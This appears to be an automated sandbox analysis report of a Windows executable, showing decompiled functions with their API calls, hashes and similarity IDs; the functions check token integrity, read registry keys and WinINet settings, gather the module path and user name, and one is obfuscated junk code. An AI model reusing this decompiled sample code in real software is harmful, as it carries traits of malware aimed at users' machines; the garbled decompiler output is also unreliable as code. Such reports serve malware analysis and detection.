    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseHandleOptionQuery
    • String ID:
    • API String ID: 4229253161-0
    • Opcode ID: a1df293b954982b1c2aa5e8e9e1713b66d25193849ca8528a1d138e987eff000
    • Instruction ID: 43d6733dac4b716c215c705d812156ee80785974a0e72e85a829a4eb1c2771d6
    • Opcode Fuzzy Hash: a1df293b954982b1c2aa5e8e9e1713b66d25193849ca8528a1d138e987eff000
    • Instruction Fuzzy Hash: 87F03172100305ABD310DBA9DC49AD7B7ECABCC795F05062EB64893251EB75D90887B5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C3B0(intOrPtr __eax) {
    				char _v64;
    				char* _v68;
    				char _v84;
    				intOrPtr _v88;
    				char _v100;
    				struct HWND__* _t11;
    				RECT* _t15;
    				struct HWND__* _t19;
    
    				_v68 =  &_v64;
    				_t15 = __eax + 0x24;
    				_v88 = __eax;
    				FillRect( *(E00410820( &_v84, _t15, 0x10) + 0x154), _t15, 2);
    				_t11 = GetTopWindow(0);
    				if(_t11 != 0) {
    					_t11 = GetWindow(_t11, 1);
    					_t19 = _t11;
    					if(_t19 != 0) {
    						while(1) {
    							_t11 = E0041C2B0(_t19,  &_v100);
    							if(_t11 == 0) {
    								goto L5;
    							}
    							_t11 = GetWindow(_t19, 3);
    							_t19 = _t11;
    							if(_t19 != 0) {
    								continue;
    							}
    							goto L5;
    						}
    					}
    				}
    				L5:
    				return _t11;
    			}












    APIs
    • FillRect.USER32 ref: 0041C3DB
    • GetTopWindow.USER32(00000000), ref: 0041C3E3
    • GetWindow.USER32(00000000,00000001), ref: 0041C3F6
      • Part of subcall function 0041C2B0: GetWindowInfo.USER32 ref: 0041C2CF
      • Part of subcall function 0041C2B0: IntersectRect.USER32 ref: 0041C311
      • Part of subcall function 0041C2B0: IsRectEmpty.USER32(?), ref: 0041C323
      • Part of subcall function 0041C2B0: IntersectRect.USER32 ref: 0041C33A
      • Part of subcall function 0041C2B0: GetTopWindow.USER32 ref: 0041C361
      • Part of subcall function 0041C2B0: GetWindow.USER32(00000000,00000001), ref: 0041C374
      • Part of subcall function 0041C2B0: GetWindow.USER32(00000000,00000003), ref: 0041C392
    • GetWindow.USER32(00000000,00000003), ref: 0041C412
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$Intersect$EmptyFillInfo
    • String ID:
    • API String ID: 3909057745-0
    • Opcode ID: 8c6bbd1d7fd0c750f2c51c9727c8340233956347564c78b67962693836a6d189
    • Instruction ID: 68686ac60d12d863a0c05e333b7fa7932fcea1bdf30774ddc77992e3fb0da26c
    • Opcode Fuzzy Hash: 8c6bbd1d7fd0c750f2c51c9727c8340233956347564c78b67962693836a6d189
    • Instruction Fuzzy Hash: 9DF0993254431017C320AB248CA1FEB73E8AFC4B40F04422EF945AB2A1DA78D94586C8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F809(int __eax, void* __edi, int __esi, short _a8, char _a446) {
    				short _v0;
    				int _t16;
    				signed int _t17;
    				WCHAR* _t19;
    				void* _t29;
    				int _t31;
    				void* _t34;
    
    				_t31 = __esi;
    				_t29 = __edi;
    				_t16 = __eax;
    				do {
    					_t16 = _t16 + 1;
    				} while ( *((char*)(_t34 + _t16 + 0x1be)) != 0);
    				_t17 = MultiByteToWideChar(0, 0,  &_a446, _t16,  &_a8, 0x14);
    				if(_t17 >= 0x14) {
    					_t17 = 0;
    				}
    				 *((short*)(_t34 + 8 + _t17 * 2)) = 0;
    				if(_t29 <= _t31) {
    					L10:
    					return 0;
    				} else {
    					_t19 =  *0x42e954;
    					if(_t19[_t31] != 0x5c || StrCmpNIW(0x42e958, _t19, _t31) != 0 || lstrcmpiW( &_v0,  *0x42e954 + 2 + _t31 * 2) != 0) {
    						goto L10;
    					} else {
    						return 1;
    					}
    				}
    			}











    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
    • StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
    • lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWidelstrcmpi
    • String ID: u5VPhXB
    • API String ID: 1977948566-1119068662
    • Opcode ID: 3455d5a78d19cf3a9b380e0cf3d96d5a23bb97dc4dd779f7b2cf7ae03726b13b
    • Instruction ID: bde1cfaaea6fc7d46d2153390d9bb73caba14f2f682869d10616ebdf7db0d017
    • Opcode Fuzzy Hash: 3455d5a78d19cf3a9b380e0cf3d96d5a23bb97dc4dd779f7b2cf7ae03726b13b
    • Instruction Fuzzy Hash: BD01F732204301AAE338AB65ED45FEB3798AB84740F80843EE046E3190E734D489879A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004128C0(void* __ebx, void* __ecx) {
    				long _v4;
    				void* _v8;
    				void* __edi;
    				long _t12;
    				void* _t22;
    
    				_t22 = 0;
    				if(OpenProcessToken(__ecx, 8,  &_v8) != 0) {
    					_t22 = E00415650(_v8);
    					if(_t22 != 0 && __ebx != 0) {
    						_t12 = GetTokenInformation(_v8, 0xc, __ebx, 4,  &_v4);
    						if(_t12 == 0) {
    							HeapFree( *0x42e6d4, _t12, _t22);
    							_t22 = 0;
    						}
    					}
    					CloseHandle(_v8);
    				}
    				return _t22;
    			}









    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000,?,00000000), ref: 004128CE
      • Part of subcall function 00415650: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,0042E908,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 00415665
      • Part of subcall function 00415650: GetLastError.KERNEL32(?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041566B
      • Part of subcall function 00415650: HeapAlloc.KERNEL32(?,00000008,-00000004,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041568B
      • Part of subcall function 00415650: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156A5
    • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),0042E908,00000004,00000000,?,00000008,00000000,00000000,?,00000000), ref: 004128FC
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000008,00000000,00000000,?,00000000), ref: 0041290F
    • CloseHandle.KERNEL32(00000000,?,00000008,00000000,00000000,?,00000000), ref: 0041291C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$Information$Heap$AllocCloseErrorFreeHandleLastOpenProcess
    • String ID:
    • API String ID: 3241878457-0
    • Opcode ID: 7c2fcd383ed786dad00b2f59500d717a169467dc67d43afa790202ebf91f9168
    • Instruction ID: 5ac835cd5c8dcb5d2861f054db74567fc53a2576f5b5cca1d552b430de00a064
    • Opcode Fuzzy Hash: 7c2fcd383ed786dad00b2f59500d717a169467dc67d43afa790202ebf91f9168
    • Instruction Fuzzy Hash: 6AF022B27002127BD6209B69DE44EEB77ACEF84B50F408529FA44E7220D774CC4087E8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004136E0(void* __ebx, DWORD* __esi) {
    				int _t1;
    				long _t4;
    				int _t8;
    				void* _t9;
    				void* _t12;
    
    				 *__esi = 0;
    				_t1 = InternetQueryOptionA(__ebx, 0x22, 0, __esi);
    				if(_t1 != 0 ||  *__esi <= _t1 || GetLastError() != 0x7a) {
    					L7:
    					return 0;
    				}
    				_t4 =  *__esi;
    				if(_t4 == 0) {
    					goto L7;
    				}
    				_t12 = HeapAlloc( *0x42e6d4, 8, _t4 + 4);
    				if(_t12 == 0) {
    					goto L7;
    				}
    				_t8 = InternetQueryOptionA(__ebx, 0x22, _t12, __esi);
    				_t9 = _t12;
    				if(_t8 != 1) {
    					E004107C0(_t9);
    					goto L7;
    				}
    				return _t9;
    			}









    APIs
    • InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 004136F4
    • GetLastError.KERNEL32(?,00000000,0040B7E5), ref: 004136FE
    • HeapAlloc.KERNEL32(?,00000008,-00000004,?,00000000,0040B7E5), ref: 0041371B
    • InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 0041372C
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInternetOptionQuery$AllocErrorFreeLast
    • String ID:
    • API String ID: 1362823640-0
    • Opcode ID: 64dbd50f46b2e7a6cb32dd5b12c952c7d96c569d577891a56da6caf8999b6f32
    • Instruction ID: a9066eb78fc694f687991784fd4e7ce484e9093c18068aa46ba267515b29f9a9
    • Opcode Fuzzy Hash: 64dbd50f46b2e7a6cb32dd5b12c952c7d96c569d577891a56da6caf8999b6f32
    • Instruction Fuzzy Hash: 68F059F060020167E3702FB69E46F57379CEB9074AF50843AF154D23C0DA34DD80862C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413740(long __ebx, DWORD* __esi, void* _a4) {
    				int _t2;
    				long _t5;
    				int _t9;
    				void* _t10;
    				void* _t13;
    				void* _t15;
    
    				_t15 = _a4;
    				 *__esi = 0;
    				_t2 = InternetQueryOptionW(_t15, __ebx, 0, __esi);
    				if(_t2 != 0 ||  *__esi <= _t2 || GetLastError() != 0x7a) {
    					L7:
    					return 0;
    				}
    				_t5 =  *__esi;
    				if(_t5 == 0) {
    					goto L7;
    				}
    				_t13 = HeapAlloc( *0x42e6d4, 8, _t5 + 4);
    				if(_t13 == 0) {
    					goto L7;
    				}
    				_t9 = InternetQueryOptionW(_t15, __ebx, _t13, __esi);
    				_t10 = _t13;
    				if(_t9 != 1) {
    					E004107C0(_t10);
    					goto L7;
    				}
    				return _t10;
    			}










    APIs
    • InternetQueryOptionW.WININET(?,0000001C,00000000,?), ref: 00413751
    • GetLastError.KERNEL32 ref: 0041375F
    • HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0041377C
    • InternetQueryOptionW.WININET(?,0000001C,00000000,?), ref: 0041378C
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInternetOptionQuery$AllocErrorFreeLast
    • String ID:
    • API String ID: 1362823640-0
    • Opcode ID: 50520d1dc781a2f6e00be83134013cc3bff76cba4995e220874e78bcdc731355
    • Instruction ID: 4cb595e8839c555d44bef47eb0ad34d10c8df4a61dde4f9281effdf46f6c2e99
    • Opcode Fuzzy Hash: 50520d1dc781a2f6e00be83134013cc3bff76cba4995e220874e78bcdc731355
    • Instruction Fuzzy Hash: 6BF0F6F12002056BD3301F669E8CF977BDDDB9076AF14482AF059D12A0DA34ED80C728
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B4E0(intOrPtr _a4, signed int _a12) {
    				signed int _t8;
    				intOrPtr* _t10;
    				intOrPtr _t12;
    				intOrPtr* _t14;
    				intOrPtr _t18;
    
    				_t8 = _a12;
    				if(_t8 == 0x64 || _t8 == 0x33) {
    					EnterCriticalSection(0x42d3ec);
    					_t18 = _a4;
    					if(_t18 == 0) {
    						L11:
    						LeaveCriticalSection(0x42d3ec);
    						return _t8;
    					}
    					_t12 =  *0x42d408; // 0x0
    					_t8 = 0;
    					if(_t12 == 0) {
    						goto L11;
    					}
    					_t14 =  *0x42d404; // 0x0
    					_t10 = _t14;
    					while( *_t10 != _t18) {
    						_t8 = _t8 + 1;
    						_t10 = _t10 + 0x24;
    						if(_t8 < _t12) {
    							continue;
    						}
    						LeaveCriticalSection(0x42d3ec);
    						return _t8;
    						goto L13;
    					}
    					if(_t8 != 0xffffffff) {
    						_t8 = SetEvent( *(_t14 + 4 + (_t8 + _t8 * 8) * 4));
    					}
    					goto L11;
    				} else {
    					return _t8;
    				}
    				L13:
    			}









    APIs
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B4F4
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B529
    • SetEvent.KERNEL32(?), ref: 0040B540
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B54C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$EnterEvent
    • String ID:
    • API String ID: 3394196147-0
    • Opcode ID: 16f34ae28cb190309f364c70331d826b0186a39a65fc09135f116c9e21ee5b54
    • Instruction ID: 7b44639ee49241949b2ffe0a4e0887c5d11e925668cafacd68b7d345f15cbd5f
    • Opcode Fuzzy Hash: 16f34ae28cb190309f364c70331d826b0186a39a65fc09135f116c9e21ee5b54
    • Instruction Fuzzy Hash: 99F08131600121ABC7259729ED8896F7755EB8572976845BBE402F22B0C739DC82C69D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BBE1(void* __eax, struct HWND__* _a8, struct HRGN__* _a12, long _a16) {
    				struct HWND__* _t24;
    				char* _t28;
    
    				_t24 = _a8;
    				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					L7:
    					return GetDCEx(_t24, _a12, _a16);
    				} else {
    					_t28 = TlsGetValue( *0x42eea4);
    					if(_t28 == 0 || _t24 !=  *((intOrPtr*)(_t28 + 4))) {
    						goto L7;
    					} else {
    						if((_a16 & 0x000000c0) != 0) {
    							DeleteObject(_a12);
    						}
    						 *_t28 = 1;
    						return  *((intOrPtr*)(_t28 + 8));
    					}
    				}
    			}






    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BBF7
    • TlsGetValue.KERNEL32(?), ref: 0041BC08
    • DeleteObject.GDI32(?), ref: 0041BC25
    • GetDCEx.USER32(?,?,?), ref: 0041BC41
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Object$DeleteSingleValueWait
    • String ID:
    • API String ID: 3401940004-0
    • Opcode ID: 1710dac4640b92d3b1631bbd75eb719eab5e02eede1b4b2c76a68bd2dda15a8b
    • Instruction ID: 7a0925eccd93afe3bbb4e347ce83823c87b895a59ee74a3181e64854f8104467
    • Opcode Fuzzy Hash: 1710dac4640b92d3b1631bbd75eb719eab5e02eede1b4b2c76a68bd2dda15a8b
    • Instruction Fuzzy Hash: DFF086722043019BC330DB19EA84AABB7E4EB94710F44492EF58197370D774EC8287A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0041D7B0(void* __ecx, void* __edx) {
    				signed char _v740;
    				char _v804;
    				signed char _v878;
    				signed int _v886;
    				char _v924;
    				char _v932;
    				void* __edi;
    				signed char _t45;
    				void* _t68;
    				signed char _t76;
    
    				_push(_t68);
    				if(E0041CAF0(__ecx, __edx, _t68, 3) == 0) {
    					__eflags = 0;
    					return 0;
    				} else {
    					E0041D610(0);
    					if( *0x42eb64 > 1 && E0041A520( &_v924) != 0) {
    						if((0x00000001 & _t45) == 0) {
    							E004232A0(_t45);
    							E0041D150( &_v804);
    							if((_v740 & 0x00000008) != 0) {
    								"SWhh9@"();
    							}
    							_t45 = _v878 | 0x00000001;
    							_v878 = _t45;
    						}
    						_t88 = _t45 & 0x00000002;
    						if((_t45 & 0x00000002) != 0) {
    							E0041F1E0(_t88);
    							_t45 = _v878 & 0xfffffffd;
    							_v878 = _t45;
    						}
    						_t90 = _t45 & 0x00000004;
    						if((_t45 & 0x00000004) != 0) {
    							if(E0041F180( &_v804, _t90) != 0) {
    								E004185D0( &_v804);
    							}
    							_t45 = _v878 & 0xfffffffb;
    							_v878 = _t45;
    						}
    						if((_t45 & 0x00000008) == 0 || (_t45 & 0x00000040) == 0) {
    							__imp__CoInitializeEx(0, 2);
    							_t76 = _t45;
    							if(_t76 == 0 || _t76 == 1 || _t76 == 0x80010106) {
    								if((_v886 & 0x00000008) == 0) {
    									E004231F0();
    									_v886 = _v886 | 0x00000008;
    								}
    								if((_v886 & 0x00000040) == 0) {
    									E00420690();
    									_v886 = _v886 | 0x00000040;
    								}
    								if(_t76 == 0 || _t76 == 1) {
    									__imp__CoUninitialize();
    								}
    							}
    						}
    						E0041A5C0( &_v932);
    					}
    					return 1;
    				}
    			}














    APIs
      • Part of subcall function 0041D610: WaitForMultipleObjects.KERNEL32(?,0042E7F4,00000001,000000FF), ref: 0041D6A4
      • Part of subcall function 0041D610: CloseHandle.KERNEL32(?,00000000,00000010), ref: 0041D6CB
      • Part of subcall function 0041A520: CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
      • Part of subcall function 0041A520: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
      • Part of subcall function 0041A520: CloseHandle.KERNEL32(00000000), ref: 0041A58A
    • CoInitializeEx.OLE32(00000000,00000002,00000003,00000000,00000003), ref: 0041D88D
    • CoUninitialize.OLE32 ref: 0041D8CF
      • Part of subcall function 0040B440: HeapFree.KERNEL32(?,00000000,?), ref: 0040B4CA
      • Part of subcall function 0040B350: SHGetFolderPathW.SHELL32 ref: 0040B392
      • Part of subcall function 0040B350: PathCombineW.SHLWAPI(?,?,-00000002,00000001,00000004,0040B280,00000000,00000000,00000000,00000000), ref: 0040B3EB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandlePathWait$CombineCreateFolderFreeHeapInitializeMultipleMutexObjectObjectsSingleUninitialize
    • String ID: @
    • API String ID: 1963761067-2766056989
    • Opcode ID: 4c621c35ef43b20ee8b642539faefc7732a57e970a2bec60f6cf67d90e0081f7
    • Instruction ID: 7a169fb76affda86cd1db34d48e03193f22ecfe9b9643f2677bcd27eac0b92e3
    • Opcode Fuzzy Hash: 4c621c35ef43b20ee8b642539faefc7732a57e970a2bec60f6cf67d90e0081f7
    • Instruction Fuzzy Hash: 9031F671D0430466DB61BB6988427DB77909F81358F84092FF9E89B2C2DB28D985839F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0041A440(void* __esi, intOrPtr _a4) {
    				char _v360;
    				char _v492;
    				void* _v496;
    				char _v500;
    				void* _v501;
    				void* __ebx;
    				void* __edi;
    				int _t24;
    				void* _t28;
    				void* _t30;
    				intOrPtr _t33;
    
    				_t30 = __esi;
    				_t33 = _a4;
    				if( *0x42e720 == 0) {
    					E0041D340(0x42e704, 2, 0x42e720);
    				}
    				_v501 = 0;
    				_v496 = 0x80000001;
    				_v500 = 0;
    				if(RegOpenKeyExW(0x80000001, 0x42e720, 0, 1,  &_v496) != 0) {
    					L11:
    					return E00410870(_t15, _t33, 0, 0x74);
    				}
    				_t6 =  &_v500; // 0x42e720
    				_t15 = E00416680(0x42e704,  &_v492,  &_v496, _t6);
    				if(_t15 == 0xffffffff) {
    					goto L11;
    				}
    				_t10 =  &_v500; // 0x42e720
    				_t28 =  *_t10;
    				if(_v492 != 3 || _t15 < 0x74) {
    					_t24 = _v501;
    				} else {
    					_push(_t30);
    					E00410820(_t33, _t28, 0x74);
    					E0041D1B0( &_v500);
    					_t15 = E00412640( &_v360, _t33, 0x74);
    					_t24 = 1;
    				}
    				if(_t28 != 0) {
    					_t15 = HeapFree( *0x42e6d4, 0, _t28);
    				}
    				if(_t24 == 0) {
    					goto L11;
    				}
    				return _t15;
    			}















    APIs
    • RegOpenKeyExW.ADVAPI32 ref: 0041A48E
    • HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD
      • Part of subcall function 0041D340: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0041D402
      • Part of subcall function 0041D340: PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,0042E704,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D439
      • Part of subcall function 0041D340: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D460
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWide$CombineFreeHeapOpenPath
    • String ID: B
    • API String ID: 367345653-2386870291
    • Opcode ID: 5a713a6511f967623ef35da4a5e0ea8751c61ea8cfb49bf1952489cee9351166
    • Instruction ID: 16aff4a99a6f18c7c42954a7cf5ffdff2c2ef91da18e197bfa23553c72f5a55e
    • Opcode Fuzzy Hash: 5a713a6511f967623ef35da4a5e0ea8751c61ea8cfb49bf1952489cee9351166
    • Instruction Fuzzy Hash: 432127313483406AD320AB619C45FEB77A8ABD4708F50092FFA8467192D7BCB985866F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E00409C70() {
    				void* _t20;
    				signed char _t22;
    				intOrPtr _t23;
    				signed int _t30;
    				void* _t31;
    				intOrPtr _t33;
    				signed int _t34;
    				signed int _t36;
    				void* _t38;
    				void* _t47;
    				void* _t48;
    				signed int _t50;
    				signed int _t51;
    				void* _t65;
    
    				_t22 = _t20 + 0x64000000 - 0x73;
    				asm("fild dword [ecx+edi*4]");
    				_pop(_t31);
    				asm("loopne 0xffffffa7");
    				asm("outsb");
    				_t48 = _t47 + 1;
    				asm("stc");
    				_pop(ss);
    				asm("pushfd");
    				if(( *(_t36 + 0x2c) & _t36) >= 0) {
    					L4:
    					asm("fisttp qword [cs:ecx-0x5aec6c7e]");
    					 *((intOrPtr*)(_t38 + 0x67d11336)) =  *((intOrPtr*)(_t38 + 0x67d11336)) + _t31;
    					_t23 = _t33;
    					_t34 = _t22;
    					asm("sbb ah, [ecx]");
    					 *0x66db7d16 = _t23;
    					_t50 = _t48 + 1 - 1;
    					asm("lodsd");
    					_push(_t23);
    					asm("iretd");
    					if (_t50 <= 0) goto L10;
    					_t51 = _t50 | _t34;
    				}
    				asm("fnsave [edx-0x80]");
    				_t22 = _t22 ^ 0x7f0d9e70;
    				 *(_t36 + 0x6f) =  *(_t36 + 0x6f) >> 0xa8;
    				asm("movsb");
    				_t36 = 0x61c19319;
    				 *0x950eaf52 =  *0x950eaf52 << 1;
    				 *(_t31 - 0x5a) =  *(_t31 - 0x5a) ^ _t30;
    				asm("fnsave [esi]");
    				asm("adc al, 0x53");
    				 *(_t31 + 0x5efd6f05) =  *(_t31 + 0x5efd6f05) | _t22;
    				asm("outsd");
    				asm("std");
    				_t38 = _t30;
    				_t65 = _t65 +  *_t30;
    				_t33 = _t33 + 1;
    				asm("int1");
    				 *(_t33 - 0x22d1722e) =  *(_t33 - 0x22d1722e) << 1;
    				goto L4;
    			}


















    APIs
    • shutdown.WS2_32(?,00000002), ref: 00409C59
    • closesocket.WS2_32(00000000), ref: 00409C60
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: closesocketshutdown
    • String ID: p0u
    • API String ID: 572888783-1742372003
    • Opcode ID: 6b278a7d7483e1dbb20f6112268c221df131b023618c8fb8f908042752422de0
    • Instruction ID: 9e88bcd4747d794709045ff0263b36523ae87ad1a44ea35881fbb89dcc29c897
    • Opcode Fuzzy Hash: 6b278a7d7483e1dbb20f6112268c221df131b023618c8fb8f908042752422de0
    • Instruction Fuzzy Hash: 6411BD7180C2409BD7208B3848996ABBBA16F83714B24866FE0D36B2D3CB365847D30D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 44%
    			E0040CA69(signed int __eax, intOrPtr __edx, struct HINSTANCE__** __edi, void* _a5, intOrPtr _a25, void* _a61, void* _a69, void* _a1081) {
    				void* _v0;
    				void* _v7;
    				void* _t27;
    				void* _t30;
    				struct HINSTANCE__** _t33;
    				void* _t35;
    				void* _t36;
    
    				_t33 = __edi;
    				_t36 = _t35 + 1;
    				_push(__eax & 0x00000018);
    				_push(0x20000);
    				_push(0x271d);
    				_a25 = __edx;
    				_t30 = E00418930(__edi);
    				__eflags = __bl;
    				if(__bl == 0) {
    					L1:
    					if( *((char*)(_t36 + 0xb)) == 1) {
    						_t27 =  *_t33;
    						if(_t27 != 0) {
    							HeapFree( *0x42e6d4, 0, _t27);
    						}
    						 *_t33 = 0;
    					}
    					goto L5;
    				} else {
    					__eflags =  *(__esp + 0x444) & 0x00000010;
    					if(( *(__esp + 0x444) & 0x00000010) == 0) {
    						L15:
    						__eflags = __bl;
    						if(__bl == 0) {
    							goto L1;
    						} else {
    							__eflags =  *(__esp + 0x444) & 0x00000020;
    							if(__eflags == 0) {
    								L5:
    								return _t30;
    							} else {
    								__eax = E0040C650(__eflags, __edi, 2);
    								__eax = E0040C650(__eflags, __edi, 0x17);
    								__al = __bl;
    								__esp = __esp + 0x438;
    								return __eax;
    							}
    						}
    					} else {
    						__eax = GetModuleFileNameW(0, __esp + 0x54, 0x103);
    						 *(__esp + 0x10) = __eax;
    						__eflags = __eax;
    						if(__eax != 0) {
    							__edx = 0;
    							__eflags = 0;
    							 *((short*)(__esp + 0x54 + __eax * 2)) = __dx;
    							__esp + 0x58 = E004189F0(__esp + 0x58, 0, __edi, 0x271e);
    							__bl = __al;
    						}
    						 *(__esp + 0x10) = 0x104;
    						__eflags = __bl;
    						if(__bl == 0) {
    							goto L1;
    						} else {
    							__eax = __esp + 0x10;
    							__imp__GetUserNameExW(2, __esp + 0x54, __esp + 0x10);
    							__eflags = __al;
    							if(__al != 0) {
    								__eax =  *(__esp + 0x10);
    								__eflags = __eax;
    								if(__eax != 0) {
    									__edx = 0;
    									__eflags = 0;
    									ds = 0x271f;
    									asm("daa");
    									 *__eax =  *__eax + __al;
    									__eflags =  *__eax;
    									 *((short*)(__esp + 0x54 + __eax * 2)) = __dx;
    									_push(__edi);
    									__esp + 0x58 = E004189F0(__esp + 0x58, 0);
    									__bl = __al;
    								}
    							}
    							goto L15;
    						}
    					}
    				}
    			}











    APIs
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040C9C8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0040CAA2
